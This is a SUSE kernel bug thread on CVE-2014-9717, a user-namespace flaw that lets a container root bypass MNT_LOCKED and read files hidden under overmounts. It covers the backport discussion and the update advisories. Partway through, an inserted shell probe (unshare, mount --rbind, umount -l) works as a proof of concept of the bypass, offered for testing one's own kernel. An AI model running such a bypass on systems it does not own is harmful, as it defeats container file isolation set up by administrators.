Bugzilla – Bug 928547
VUL-1: CVE-2014-9717: kernel: USERNS allows circumventing MNT_LOCKED
Last modified: 2017-09-20 14:52:41 UTC
Another obscure bug: http://www.openwall.com/lists/oss-security/2015/04/17/4

> Date: Fri, 17 Apr 2015 11:44:14 -0400
> From: Eric Windisch <eric@...disch.us>
> To: oss-security@...ts.openwall.com
> Cc: cve-assign@...re.org
> Subject: USERNS allows circumventing MNT_LOCKED
>
> In October 2014, Andrey Vagin reported[1] to the Linux Containers list that
> it would be possible to use user namespaces to circumvent MNT_LOCKED and
> allow unprivileged users to access the directory structure underneath of
> mounts. A PoC was also produced and is public.
>
> Patches are now available and proposed to Linus[2].
>
> This may not simply be information disclosure, but containerized
> environments may through chroot and mount namespaces mask directory
> structures as read-only or inaccessible via the use of bind-mounts. Such
> read-only masking may be circumvented by this vulnerability on systems
> where these directories are not otherwise protected by MAC (i.e. SELinux or
> AppArmor).
>
> Regards,
> Eric Windisch
>
> [1] https://groups.google.com/forum/#!topic/linux.kernel/HnegnbXk0Vs
> [2] http://www.spinics.net/lists/linux-containers/msg30786.html

The mainline merge commit is 8f502d5b9e3362971f58dad5d468f070340336e1

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9717
http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-9717.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9717
bugbot adjusting priority
will take care of this.
Jiri,

Many of those patches have Cc: stable@, but I can only see

cd4a40174b71 mnt: Fail collect_mounts when applied to unmounted mounts

in the 3.12-stable series. Have you looked at the others and decided they are not appropriate for -stable or is there some other reason that only one of those was backported?
(In reply to Miklos Szeredi from comment #5)
> Many of those patches have Cc: stable@, but I can only see
>
> cd4a40174b71 mnt: Fail collect_mounts when applied to unmounted mounts
>
> in the 3.12-stable series.

Yes, I was explicitly asked to merge that one:
http://comments.gmane.org/gmane.linux.kernel.stable/135336

> Have you looked at the others and decided they are not appropriate for
> -stable or is there some other reason that only one of those was backported?

No, I haven't looked at them all yet. But at least this one:

820f9f147dcc fs_pin: Allow for the possibility that m_list or s_list go unused.

is not needed apparently: "The fact most of these changes depends on fs_pin likely limits how far they may be backported" and "Yes. This one isn't harmful back at 3.16.". See the link above.

So if you provide me with SHAs I should take to 3.12, I will :).
Okay, I'll have a look then.
I don't think that we can reasonably fix this "issue".

There is a patch which fixes a problem that leads to a kernel panic. That addresses the "PoC [that] was also produced and is public."

The more general problem is that if a sysadmin provides some filesystem to a user-namespace container and tries to hide parts of it by mounting something over those parts, then this is ineffective. The "root" in the user namespace can "cd" into that filesystem, then use "umount -l" to unmount the filesystem and everything mounted on it. Then it will be able to "cd" around the filesystem, including into the "hidden" parts.

The changes required to "fix" this are very invasive and I don't think the problem scenario justifies those changes.

Possibly a tech-note advising customers "Mounting one filesystem over another is not a reliable way to hide files from a user which would otherwise have access to those files"

I have submitted the crash-fix patch

Commit: 8486a7882b5b ("mnt: Move the clear of MNT_LOCKED from copy_tree to it's callers.")

but I don't think any other code changes are justified.
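A shell probe for the scenario described in the comment above, added here as an example; it is not code from the bug report, from the public PoC, or from any SUSE tooling. It assumes util-linux `unshare` with `-U`, `-r` and `-m`, unprivileged user namespaces enabled, and that the nested "container root" obtains an unlocked copy of the overmounted tree with `mount --rbind` before `cd`-ing into it and lazily unmounting that copy (the copied child mounts stay MNT_LOCKED, the copy's root does not). The function name and the temporary paths are this example's own. On a kernel with the fix the lazy unmount leaves the locked tmpfs in place and the probe reports `hidden`; on an unfixed kernel the tmpfs is detached with the tree and the probe reports `revealed`; where namespaces or mounts cannot be created it reports `unsupported` and has tested nothing.

```shell
#!/bin/sh
# Probe: can a user-namespace root see what is under an overmount after 'umount -l'?
# Added example, not from the bug report. Prints exactly one word:
#   revealed    - hidden file readable after the lazy unmount (unfixed kernel)
#   hidden      - overmount survived the lazy unmount (fixed kernel)
#   refused     - the lazy unmount itself was rejected
#   unsupported - unprivileged userns/mounts unavailable here; nothing tested
probe_overmount_bypass() {
    base=$(mktemp -d 2>/dev/null) || { echo unsupported; return 0; }
    mkdir -p "$base/fs/secret" "$base/mnt"
    # Constructed canary; the "host" will try to mask it with a tmpfs overmount.
    echo canary > "$base/fs/secret/flag"

    # Stage 2: root of a nested user+mount namespace (the "container root").
    # Every mount it inherited from stage 1 is MNT_LOCKED, so it cannot umount
    # the tmpfs directly; it rbinds the tree to get an unlocked root, keeps a
    # reference via cwd, and lazily unmounts that root.
    cat > "$base/inner.sh" <<'EOF'
base=$1
mount --rbind "$base/fs" "$base/mnt" 2>/dev/null || { echo unsupported; exit 0; }
cd "$base/mnt" || { echo unsupported; exit 0; }
umount -l "$base/mnt" 2>/dev/null || { echo refused; exit 0; }
[ -r secret/flag ] && echo revealed || echo hidden
EOF

    # Stage 1: root of the first user+mount namespace (the "host" preparing the
    # filesystem handed to the container). Propagation is made private first so
    # nothing leaks back to the real host mount table.
    cat > "$base/outer.sh" <<'EOF'
base=$1
mount --make-rprivate / 2>/dev/null || { echo unsupported; exit 0; }
mount --bind "$base/fs" "$base/fs" 2>/dev/null || { echo unsupported; exit 0; }
mount -t tmpfs none "$base/fs/secret" 2>/dev/null || { echo unsupported; exit 0; }
# Sanity: the overmount must actually mask the canary before we test the bypass.
[ -e "$base/fs/secret/flag" ] && { echo unsupported; exit 0; }
exec unshare -Urm sh "$base/inner.sh" "$base"
EOF

    result=$(unshare -Urm sh "$base/outer.sh" "$base" 2>/dev/null) || result=unsupported
    rm -rf "$base"
    case "$result" in
        revealed|hidden|refused) echo "$result" ;;
        *) echo unsupported ;;
    esac
}

probe_overmount_bypass
```

Run it as an unprivileged user on the kernel you intend to ship; `revealed` is the failure mode the comment describes, and `unsupported` means the probe could not exercise the path (for instance under a seccomp profile that blocks `unshare`), not that the kernel is fixed. Either way, as the report and the comments here say, a mount stacked over a directory is not an access control; a MAC policy on the masked paths is.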
... and the original report says:

> Such read-only masking may be circumvented by this vulnerability on
> systems where these directories are not otherwise protected by MAC
> (i.e. SELinux or AppArmor).

which we probably should say in our tech-note too, but formulated a bit more actively, and say that people should do MAC if they need proper protection... sec-team can complain if they're still not satisfied with the solution.

Btw, any info on how RH have fixed this?
(In reply to Borislav Petkov from comment #11)

This is an area where vulnerabilities pop up all the time currently. I think we can leave it as it is. Anyone using a setup like this needs to be aware that additional measures are necessary to keep it safe.

RH lists itself as not affected by this.
SUSE-SU-2016:1690-1: An update that solves 29 vulnerabilities and has 89 fixes is now available.

Category: security (important)
Bug References: 676471,880007,889207,899908,903279,928547,931448,940413,943989,944309,945345,947337,953233,954847,956491,956852,957805,957986,960857,962336,962846,962872,963193,963572,963762,964461,964727,965319,966054,966245,966573,966831,967251,967292,967299,967903,968010,968141,968448,968512,968667,968670,968687,968812,968813,969439,969571,969655,969690,969735,969992,969993,970062,970114,970504,970506,970604,970892,970909,970911,970948,970955,970956,970958,970970,971049,971124,971125,971126,971159,971170,971360,971600,971628,971947,972003,972174,972844,972891,972933,972951,973378,973556,973570,973855,974165,974308,974406,974418,974646,975371,975488,975533,975945,976739,976868,977582,977685,978401,978822,979169,979213,979419,979485,979548,979867,979879,980348,980371,981143,981344,982354,982698,983213,983318,983394,983904,984456
CVE References: CVE-2014-9717,CVE-2015-8816,CVE-2015-8845,CVE-2016-0758,CVE-2016-2053,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3136,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-3672,CVE-2016-3689,CVE-2016-3951,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-5244
Sources used:
SUSE Linux Enterprise Workstation Extension 12 (src): kernel-default-3.12.60-52.49.1
SUSE Linux Enterprise Software Development Kit 12 (src): kernel-docs-3.12.60-52.49.3, kernel-obs-build-3.12.60-52.49.1
SUSE Linux Enterprise Server 12 (src): kernel-default-3.12.60-52.49.1, kernel-source-3.12.60-52.49.1, kernel-syms-3.12.60-52.49.1, kernel-xen-3.12.60-52.49.1
SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.60-52.49.1
SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12_Update_14-1-2.1
SUSE Linux Enterprise Desktop 12 (src): kernel-default-3.12.60-52.49.1, kernel-source-3.12.60-52.49.1, kernel-syms-3.12.60-52.49.1, kernel-xen-3.12.60-52.49.1
SUSE-SU-2016:1696-1: An update that solves 16 vulnerabilities and has 66 fixes is now available.

Category: security (important)
Bug References: 662458,676471,889207,897662,899908,903279,908151,928547,931448,937086,940413,942262,943989,944309,945345,951844,953233,957805,958390,959514,960857,962336,962846,962872,963572,964461,964727,965319,966054,966573,967640,968497,968687,968812,968813,969016,970604,970609,970892,970911,970948,970955,970956,970958,970970,971049,971124,971126,971159,971170,971600,971628,971793,971947,972003,972068,972174,972780,972844,972891,972951,973378,973556,973855,974418,974646,974692,975371,975488,975772,975945,976739,976821,976868,977582,977685,978401,978527,978822,979213,979347,983143
CVE References: CVE-2014-9717,CVE-2016-1583,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2847,CVE-2016-3134,CVE-2016-3136,CVE-2016-3137,CVE-2016-3138,CVE-2016-3140,CVE-2016-3689,CVE-2016-3951,CVE-2016-4482,CVE-2016-4486,CVE-2016-4569
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP1 (src): kernel-default-3.12.59-60.41.2
SUSE Linux Enterprise Software Development Kit 12-SP1 (src): kernel-docs-3.12.59-60.41.8, kernel-obs-build-3.12.59-60.41.2
SUSE Linux Enterprise Server 12-SP1 (src): kernel-default-3.12.59-60.41.2, kernel-source-3.12.59-60.41.2, kernel-syms-3.12.59-60.41.1, kernel-xen-3.12.59-60.41.2
SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.59-60.41.2
SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12-SP1_Update_5-1-2.1
SUSE Linux Enterprise Desktop 12-SP1 (src): kernel-default-3.12.59-60.41.2, kernel-source-3.12.59-60.41.2, kernel-syms-3.12.59-60.41.1, kernel-xen-3.12.59-60.41.2
SUSE-SU-2016:1937-1: An update that solves 24 vulnerabilities and has 76 fixes is now available.

Category: security (important)
Bug References: 662458,676471,897662,928547,944309,945345,947337,950998,951844,953048,953233,954847,956491,957805,957986,957990,958390,958463,960857,962742,962846,963762,964727,965087,966245,967640,968667,969016,970114,970506,970604,970609,970948,971049,971770,971947,972124,972933,973378,973499,973570,974165,974308,974620,974646,974692,975533,975772,975788,976739,976821,976868,977417,977582,977685,978401,978469,978527,978822,979169,979213,979347,979419,979485,979489,979521,979548,979867,979879,979922,980246,980348,980371,980706,981038,981143,981344,982282,982354,982544,982698,983143,983213,983318,983394,983721,983904,983977,984148,984456,984755,985232,985978,986362,986569,986572,986811,988215,988498,988552
CVE References: CVE-2014-9717,CVE-2014-9904,CVE-2015-7833,CVE-2015-8539,CVE-2015-8551,CVE-2015-8552,CVE-2015-8845,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2847,CVE-2016-3672,CVE-2016-3707,CVE-2016-4470,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-4997,CVE-2016-5244,CVE-2016-5828,CVE-2016-5829
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP1 (src): kernel-compute-3.12.61-60.18.1, kernel-compute_debug-3.12.61-60.18.1, kernel-rt-3.12.61-60.18.1, kernel-rt_debug-3.12.61-60.18.1, kernel-source-rt-3.12.61-60.18.1, kernel-syms-rt-3.12.61-60.18.1
released